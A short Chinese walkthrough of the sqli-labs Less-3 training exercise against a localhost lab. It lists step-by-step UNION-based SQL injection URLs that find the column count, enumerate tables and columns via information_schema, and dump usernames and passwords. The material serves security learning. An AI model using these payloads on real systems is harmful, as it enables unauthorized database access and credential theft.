sqli-labs(Less-3)

在这里插入图片描述
1. 通过构造id=1’ 和id=1’) 和id=1’)–+确定存在注入
可知原始url为 id=(‘1’)

2.使用order by 语句猜字段数

http://127.0.0.1/sqlilabs/Less-3/?id=1') order by 4 --+
http://127.0.0.1/sqlilabs/Less-3/?id=1') order by 3 --+

3. 使用联合查询union select

http://127.0.0.1/sqlilabs/Less-3/?id=-1') union select 1,2,3 --+
http://127.0.0.1/sqlilabs/Less-3/?id=-1') union select 1,database(),version() --+

4. 查询当前库的所有表

http://127.0.0.1/sqlilabs/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

5.查询某表的所有列名

http://127.0.0.1/sqlilabs/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+

6. 获取账号密码

http://127.0.0.1/sqlilabs/Less-3/?id=-1') union select 1,group_concat(username),group_concat(password) from users --+```
http://127.0.0.1/sqlilabs/Less-3/?id=-1') union select 1,username,password from users limit 0,1 --+

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mfbz.cn/a/149030.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈qq邮箱809451989@qq.com，一经查实，立即删除！